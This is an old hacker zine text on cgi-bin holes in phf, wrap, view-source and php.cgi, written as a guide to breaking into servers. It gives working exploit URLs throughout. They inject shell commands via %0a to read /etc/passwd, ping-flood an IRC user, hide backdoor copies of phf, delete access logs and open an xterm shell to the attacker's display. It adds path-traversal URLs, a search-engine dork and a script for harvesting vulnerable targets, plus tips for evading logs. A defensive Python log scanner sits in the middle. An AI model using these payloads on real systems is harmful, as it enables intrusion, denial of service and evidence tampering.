***     Security Holes in cgi-bin
***     memor@mygale.org - http://www.mygale.org/00/memor

***     1 - The well-known phf script:

        Mostly the victim URL is really insecure and the system admin
        doesn't know about the cgi-bin security hole.
        And mostly the hackers use that hole this way:
        http://www.victim.com/cgi-bin/phf?Qname=a%0acat%20/etc/passwd
        but well, lots of phf are patched and more and more servers
        are now protected, and well.. system admins "sometimes" know
        about shadowing their passwd file, and getting login:x: in the Query
        Result is not really what those hackers are looking for.
        By the way.. HTTP commands (GET mostly) are logged in the
        /www/logs/ directory.. so when u try some hack with phf
        on the navy or some secret services.. hm.. u should use a gateway
        first..
        Well.. there are other uses for that script.. personally,
        I don't use it for reading the server passwd file, for the
        reasons I explained before..
        You must remember that %0a is a newline (LF), which escapes to
        the command shell, and that %20 is a space.
        For example.. I'm on EFnet IRC and some AOL lamer is annoying me
        ... I use a lame weapon for killing him.. a really lame one :
        ICMP via phf..
        
        /whois AoLaMer
        *** AoLaMer is ppp125.lamer.aol.com 
        *** AoLaMer is on #Aoltalk
        *** AoLaMer is using irc.primenet.com
        *** AoLaMer is away: Lamer
        *** Notice that I used some lame mIRC winblows interface.
        
        [10:01] <AoLaMer> You suck dude, im 3|1+3 cause i use AoL!
        [10:02] <memor> ok man

        I use my favorite netscrupe brownser now and I enter that URL:
        http://www.victim.com/cgi-bin/phf?Qname=a%0aping%20-c%201000%20-s%205000%20ppp125.lamer.aol.com

        well, that command will be translated by the server
        (%20 becomes a space, %0a a newline) into:
        ping -c 1000 -s 5000 ppp125.lamer.aol.com

        the victim server will hit that dude's modem with 1000 packets
        of 5008 bytes.. if he is really lame.. abort the current
        "Contacting Server" (netscrupe won't stop saying "Contacting Server"
        until the ICMP is completely done).. so abort it.. The ICMP
        will continue during that time.. then do another Query.. so
        another 1000 packets of 5008 bytes.. when I tried to ICMP with
        ping echoes > 6008 bytes, the server returned -1.. well: an error.
        
        There are other uses.. commands in /bin that www can access,
        and u can mkdir and write in the www dirs..

        like (...)%20cp%20phf%20.fhp will copy phf to .fhp so the kewl
        root won't see it with a normal ls (-l) but.. hmm beware if he
        uses ls -a .. so u'll be able to call it afterwards by
        http://www.victim.lame.com/cgi-bin/.fhp ..
        
***     2 - The wrap script:

        Well, I'll be quick on the wrap script ... it's a bogus script
        found among the IRIX 6.2 features as far as I know, and the use is
        http://www.victim.com/cgi-bin/wrap?../../../etc/passwd
        I know that script only allows viewing a file.. and well, on IRIX..
        and.. passwd files are sometimes shadowed.
        well, I didn't try http://www.victim.com/cgi-bin/wrap?%0als(...)
        so.. I don't know if that script is that bogus.. I should also
        try some buffer overflow.. but same here.. I don't know if it
        works.

***     3 - The view-source script:

        I was really proud to find that script.. I found it on
        the Florida Institute of Technology server..
        http://www.fit.edu after they had patched their phf by
        "rm-ing" it and after having "rm-ed" my fhp and my .fhp
        and my other .YouSuck ones.. They know the use of ls -a,
        Wonderful!! but well.. here view-source was not really
        useful.. view-source is a "wrap" for Netscape Communicator 2.0
        features. (do a http://www.future.victim.com/cgi-bin/test-cgi)
        and well.. like wrap.. it's the same way to access the passwd
        file..
        http://www.new.victim.com/cgi-bin/view-source?../../../etc/passwd
        .. on www.fit.edu their passwd file is shadowed btw.
        I tried some
        http://www.old.victim.com/cgi-bin/view-source?%1b or %0a ..
        other %20.. but.. no luck..
        the only strange thing I saw was with a %0a .. some strange Query
        Results were appearing..
        I tried a buffer overflow of view-source but it doesn't work.
        
***     4 - The php.cgi script:

        Well, I never used the php.cgi script but I know that it's normally
        like wrap or view-source... so the use is
        http://www.victim.com/cgi-bin/php.cgi?../../../etc/passwd
        well, same here.. I did hear it had a way to escape to the
        command shell.. but I don't know about it. personally
        I use other ways (not httpd ones) for hacking servers.

***     5 - Some uses I did with phf.

        http://www.victim.com/cgi-bin/phf?Qname=a%0aping%20-c%201000%20-s%205000%20ip%20to%20shoot

        http://www.victim.com/cgi-bin/phf?Qname=a%0acp%20phf%20fhp

        http://www.victim.com/cgi-bin/phf?Qname=a%0acp%20phf%20.blah

        http://www.victim.com/cgi-bin/phf?Qname=a%0als%20-al%20/dir/to/go

        http://www.victim.com/cgi-bin/phf?Qname=a%0amkdir%20/www/dirtocreate

        http://www.victim.com/cgi-bin/phf?Qname=a%0arm%20../logs/access_log

***     6 - But remember:

        The httpd accesses are logged in the logs dir of the www directory.
        so.. hmm, don't try to hack some "High Security" server with that..
        well, for me, I hacked one time a "hot" server.. the National
        Supercomputing Center for Energy and Environment (www.nscee.edu)
        .. the next day.. all was patched and the whole passwd file I got
        and decrypted was.. disabled .. :*:
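The httpd access log is exactly where the requests from sections 1 and 5 show up, so here is an added example (not part of the original zine) of what an admin can run over it: a Python scanner that decodes each request the way the CGI script would and flags a %0a newline injection against phf, wrap, view-source or php.cgi, and a ../ traversal against the same four scripts. The log lines are constructed in common log format and the client addresses are placeholders.

```python
import re
from urllib.parse import unquote, urlsplit

# Common log format: host ident user [time] "METHOD url PROTO" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+)[^"]*" (?P<status>\d{3})'
)

# The four CGI scripts the text covers. phf hands the query to a shell, so a
# newline in it starts a second command; the others open a file named by the
# query, so ../ walks out of the intended directory.
CGI_SCRIPTS = ("phf", "wrap", "view-source", "php.cgi")

def analyse(line):
    """Return a finding dict for one log line, or None if it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("url"))
    script = parts.path.rsplit("/", 1)[-1]
    if script not in CGI_SCRIPTS:
        return None
    # Decode %0a / %20 etc. exactly as the server-side script would see them.
    query = unquote(parts.query)
    if "\n" in query or "\r" in query:
        # Everything after the first newline is what reached the shell.
        injected = re.split(r"[\r\n]", query, maxsplit=1)[1].strip()
        return {"host": m.group("host"), "script": script,
                "kind": "command-injection", "detail": injected}
    if "../" in query:
        return {"host": m.group("host"), "script": script,
                "kind": "path-traversal", "detail": query}
    return None

def scan(lines):
    """Run analyse() over an iterable of log lines, keeping only findings."""
    return [f for f in (analyse(l) for l in lines) if f]

# Constructed sample log lines; 10.0.0.x clients and the timestamps are made up.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Jan/1997:10:03:12 -0500] "GET /cgi-bin/phf?Qname=a%0aping%20-c%201000%20-s%205000%20ppp125.lamer.aol.com HTTP/1.0" 200 512',
    '10.0.0.5 - - [10/Jan/1997:10:04:01 -0500] "GET /cgi-bin/phf?Qname=a%0Acp%20phf%20.fhp HTTP/1.0" 200 300',
    '10.0.0.7 - - [10/Jan/1997:10:05:44 -0500] "GET /cgi-bin/view-source?../../../etc/passwd HTTP/1.0" 200 2048',
    '10.0.0.9 - - [10/Jan/1997:10:06:10 -0500] "GET /cgi-bin/phf?Qname=smith HTTP/1.0" 200 800',
    '10.0.0.9 - - [10/Jan/1997:10:07:00 -0500] "GET /index.html HTTP/1.0" 200 1024',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['host']} {f['kind']} via {f['script']}: {f['detail']}")
```

The uppercase %0A in the second line is caught because unquote() decodes both cases; a legitimate phf lookup (the fourth line) and a plain page fetch produce no finding.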



  More on cgi-bin holes - by ]NiCK[

1 - The largest server database helps exploit phf
*************************************************

     My pick: ALTA-VISTA ! :) yeah ! if you know the syntax of
     this web search well enough, you can succeed in getting a list of more
     than 3000 insecure servers with this method, simply by typing:

     http://altavista.digital.com/cgi-bin/query?pg=aq&what=web&fmt=.&q=link%3A%22%2Fcgi-bin%2Fphf%22&r=&d0=&d1=
     (type this all on one line)

     Too easy! Isn't it? Also, you can modify it to search for php.cgi,
     webgais, or others such as view-source...
     
 Note:  Sometimes, some servers won't work... but it's just because the
        database isn't updated every day.


2 - Other stuff to exploit web searches
*************************************

     I love the "Yellow Pages" of organizations, enterprises, or companies
     like for instance Adminnet (www.adminet.com)... it's filled with kewl
     insecure web servers.. But the problem is that it's not very
     interesting to scan manually... So, I wrote a little program to turn
     the HTML index of web servers into a list of exploitable servers for
     phfscan or phpscan...

     Here is a little unix script (html2list):

--
#!/bin/sh
# html2list: pull the host names out of every http:// link in an HTML
# file and write them, one per line and de-duplicated, to file.html.list
if [ $# = 0 ]
then
    echo "Usage: html2list file.html" >&2
    exit 1
fi
# split on quotes to isolate the URLs, drop the http:// prefix, then split
# on / so the host name becomes its own line; keep only lines containing a
# dot and throw away .html/.htm file names that also contain one
grep '"http://' "$1" | tr '"' '\n' | grep '^http://' | cut -c8- \
    | tr '/' '\n' | grep '\.' | grep -vi '\.html\|\.htm' | sort -u > "$1.list"
--

 Note:  You can change/update it to a better way of scanning...


3 - Xterm with phf
******************

     Cracking the /etc/passwd ! ok... but there are better things to do
     than waste your time. This attack consists of using xterm with phf.
     So, of course X Windows must be present on the victim server, and you
     must also be running it. While in X Windows, type: 'xhost
     +www.victim.com' This is so your machine will accept connections
     from victim.com... You can simply type 'xhost +', but it isn't really
     secure... After that, you must know what OS www.victim.com is running,
     so you can guess the path of xterm.
     
     Here are some default xterm paths for a few systems:
     
   AIX  : /usr/bin/X11/xterm
   HP-UX: /usr/bin/X11/hpterm
   Linux: /usr/X11R6/bin/xterm
   SunOS: /usr/openwin/bin/xterm

     You can also use: 'find /usr -name xterm' or again 'whereis xterm' if
     you have a shell on the machine.

     Finally, once you have found the path, you can run xterm via phf like:

     http://www.victim.com/cgi-bin/phf?Qname=a%0a/usr/openwin/bin/xterm%20-display%20your.ip.com:0
     (all on one line)

     Wait a few seconds... and whoop, a shell from the victim's server will
     appear in your X window. :) Usually you become the user nobody, but
     sometimes, if the http daemon runs in a root shell, you become root,
     or www sometimes.. The best thing is that your access is not logged
     in the lastlog or wtmp... Very clean exploit !

Have PHFun ! :)


-]NiCK[ <Modul1@usa.net>
